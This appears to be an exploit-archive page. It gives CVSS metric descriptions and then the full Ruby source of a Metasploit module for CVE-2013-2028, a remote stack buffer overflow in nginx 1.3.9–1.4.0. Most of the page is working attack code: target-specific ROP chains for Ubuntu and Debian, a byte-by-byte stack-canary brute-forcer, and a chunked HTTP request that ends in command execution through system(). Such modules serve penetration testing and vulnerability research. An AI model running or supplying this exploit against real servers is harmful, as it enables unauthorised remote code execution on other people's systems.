The vulnerable system is bound to the network stack and the set of possible attackers extends beyond the other options listed below, up to and including the entire Internet. Such a vulnerability is often termed “remotely exploitable” and can be thought of as an attack being exploitable at the protocol level one or more network hops away (e.g., across one or more routers). An example of a network attack is an attacker causing a denial of service by sending a specially crafted TCP packet across a wide area network (e.g., CVE-2004-0230).
Attack Complexity
Low
AC
The attacker must take no measurable action to exploit the vulnerability. The attack requires no target-specific circumvention to exploit the vulnerability. An attacker can expect repeatable success against the vulnerable system.
Privileges Required
None
PR
The attacker is unauthenticated prior to attack, and therefore does not require any access to settings or files of the vulnerable system to carry out an attack.
User Interaction
None
UI
The vulnerable system can be exploited without interaction from any human user, other than the attacker. Examples include: a remote attacker is able to send packets to a target system a locally authenticated attacker executes code to elevate privileges
Scope
Unchanged
S
An exploited vulnerability can only affect resources managed by the same security authority. In the case of a vulnerability in a virtualized environment, an exploited vulnerability in one guest instance would not affect neighboring guest instances.
Confidentiality
High
C
There is total information disclosure, resulting in all data on the system being revealed to the attacker, or there is a possibility of the attacker gaining control over confidential data.
Integrity
High
I
There is a total compromise of system integrity. There is a complete loss of system protection, resulting in the attacker being able to modify any file on the target system.
Availability
High
A
There is a total shutdown of the affected resource. The attacker can deny access to the system or data, potentially causing significant loss to the organization.
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
class Metasploit4 < Msf::Exploit::Remote
include Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
'Name' => 'Nginx HTTP Server 1.3.9-1.4.0 Chuncked Encoding Stack Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in versions 1.3.9 to 1.4.0 of nginx.
The exploit first triggers an integer overflow in the ngx_http_parse_chunked() by
supplying an overly long hex value as chunked block size. This value is later used
when determining the number of bytes to read into a stack buffer, thus the overflow
becomes possible.
},
'Author' =>
[
'Greg MacManus', # original discovery
'hal', # Metasploit module
'saelo' # Metasploit module
],
'DisclosureDate' => 'May 07 2013',
'License' => MSF_LICENSE,
'References' =>
[
['CVE', '2013-2028'],
['OSVDB', '93037'],
['URL', 'http://nginx.org/en/security_advisories.html'],
['URL', 'http://packetstormsecurity.com/files/121560/Nginx-1.3.9-1.4.0-Stack-Buffer-Overflow.html']
],
'Privileged' => false,
'Payload' =>
{
'BadChars' => "\x0d\x0a",
},
'Arch' => ARCH_CMD,
'Platform' => 'unix',
'Targets' =>
[
[ 'Ubuntu 13.04 32bit - nginx 1.4.0', {
'CanaryOffset' => 5050,
'Offset' => 12,
'Writable' => 0x080c7330, # .data from nginx
:dereference_got_callback => :dereference_got_ubuntu_1304,
:store_callback => :store_ubuntu_1304,
}],
[ 'Debian Squeeze 32bit - nginx 1.4.0', {
'Offset' => 5130,
'Writable' => 0x080b4360, # .data from nginx
:dereference_got_callback => :dereference_got_debian_squeeze,
:store_callback => :store_debian_squeeze
} ],
],
'DefaultTarget' => 0
))
register_options([
OptPort.new('RPORT', [true, "The remote HTTP server port", 80])
], self.class)
register_advanced_options(
[
OptInt.new("CANARY", [false, "Use this value as stack canary instead of brute forcing it", 0xffffffff ]),
], self.class)
end
def peer
"#{rhost}:#{rport}"
end
def check
begin
res = send_request_fixed(nil)
if res =~ /^Server: nginx\/(1\.3\.(9|10|11|12|13|14|15|16)|1\.4\.0)/m
return Exploit::CheckCode::Appears
elsif res =~ /^Server: nginx/m
return Exploit::CheckCode::Detected
end
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
print_error("#{peer} - Connection failed")
end
return Exploit::CheckCode::Unknown
end
#
# Generate a random chunk size that will always result
# in a negative 64bit number when being parsed
#
def random_chunk_size(bytes=16)
return bytes.times.map{ (rand(0x8) + 0x8).to_s(16) }.join
end
def send_request_fixed(data)
connect
request = "GET / HTTP/1.1\r\n"
request <<"Host: #{Rex::Text.rand_text_alpha(16)}\r\n"
request <<"Transfer-Encoding: Chunked\r\n"
request <<"\r\n"
request <<"#{data}"
sock.put(request)
res = nil
begin
res = sock.get_once(-1, 0.5)
rescue EOFError => e
# Ignore
end
disconnect
return res
end
def store_ubuntu_1304(address, value)
chain = [
0x0804c415, # pop ecx ; add al, 29h ; ret
address, # address
0x080b9a38, # pop eax ; ret
value.unpack('V').first, # value
0x080a9dce, # mov [ecx], eax ; mov [ecx+4], edx ; mov eax, 0 ; ret
]
return chain.pack('V*')
end
def dereference_got_ubuntu_1304
chain = [
0x08094129, # pop esi; ret
0x080c5090, # GOT for localtime_r
0x0804c415, # pop ecx ; add al, 29h ; ret
0x001a4b00, # Offset to system
0x080c360a, # add ecx, [esi] ; adc al, 41h ; ret
0x08076f63, # push ecx ; add al, 39h ; ret
0x41414141, # Garbage return address
target['Writable'], # ptr to .data where contents have been stored
]
return chain.pack('V*')
end
def store_debian_squeeze(address, value)
chain = [
0x08050d93, # pop edx ; add al 0x83 ; ret
value.unpack('V').first, # value
0x08067330, # pop eax ; ret
address, # address
0x08070e94, # mov [eax] edx ; mov eax 0x0 ; pop ebp ; ret
0x41414141, # ebp
]
return chain.pack('V*')
end
def dereference_got_debian_squeeze
chain = [
0x0804ab34, # pop edi ; pop ebp ; ret
0x080B4128 -
0x5d5b14c4, # 0x080B4128 => GOT for localtime_r; 0x5d5b14c4 => Adjustment
0x41414141, # padding (ebp)
0x08093c75, # mov ebx, edi ; dec ecx ; ret
0x08067330, # pop eax # ret
0xfffb0c80, # offset
0x08078a46, # add eax, [ebx+0x5d5b14c4] # ret
0x0804a3af, # call eax # system
target['Writable'] # ptr to .data where contents have been stored
]
return chain.pack("V*")
end
def store(buf, address, value)
rop = target['Rop']
chain = rop['store']['chain']
chain[rop['store']['address_offset']] = address
chain[rop['store']['value_offset']] = value.unpack('V').first
buf << chain.pack('V*')
end
def dereference_got
unless self.respond_to?(target[:store_callback]) and self.respond_to?(target[:dereference_got_callback])
fail_with(Exploit::Failure::NoTarget, "Invalid target specified: no callback functions defined")
end
buf = ""
command = payload.encoded
i = 0
while i < command.length
buf << self.send(target[:store_callback], target['Writable'] + i, command[i, 4].ljust(4, ";"))
i = i + 4
end
buf << self.send(target[:dereference_got_callback])
return buf
end
def exploit
data = random_chunk_size(1024)
if target['CanaryOffset'].nil?
data << Rex::Text.rand_text_alpha(target['Offset'] - data.size)
else
if not datastore['CANARY'] == 0xffffffff
print_status("#{peer} - Using 0x%08x as stack canary" % datastore['CANARY'])
canary = datastore['CANARY']
else
print_status("#{peer} - Searching for stack canary")
canary = find_canary
if canary.nil? || canary == 0x00000000
fail_with(Exploit::Failure::Unknown, "#{peer} - Unable to find stack canary")
else
print_good("#{peer} - Canary found: 0x%08x\n" % canary)
end
end
data <<Rex::Text.rand_text_alpha(target['CanaryOffset'] - data.size)
data <<[canary].pack('V')
data << Rex::Text.rand_text_hex(target['Offset'])
end
data << dereference_got
begin
send_request_fixed(data)
rescue Errno::ECONNRESET => e
# Ignore
end
handler
end
def find_canary
# First byte of the canary is already known
canary = "\x00"
print_status("#{peer} - Assuming byte 0 0x%02x" % 0x00)
# We are going to bruteforce the next 3 bytes one at a time
3.times do |c|
print_status("#{peer} - Bruteforcing byte #{c + 1}")
0.upto(255) do |i|
data = random_chunk_size(1024)
data <<Rex::Text.rand_text_alpha(target['CanaryOffset'] - data.size)
data <<canary
data << i.chr
unless send_request_fixed(data).nil?
print_good("#{peer} - Byte #{c + 1} found: 0x%02x" % i)
canary << i.chr
break
end
end
end
if canary == "\x00"
return nil
else
return canary.unpack('V').first
end
end
end
This information is provided for TESTING and LEGAL RESEARCH purposes only. All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum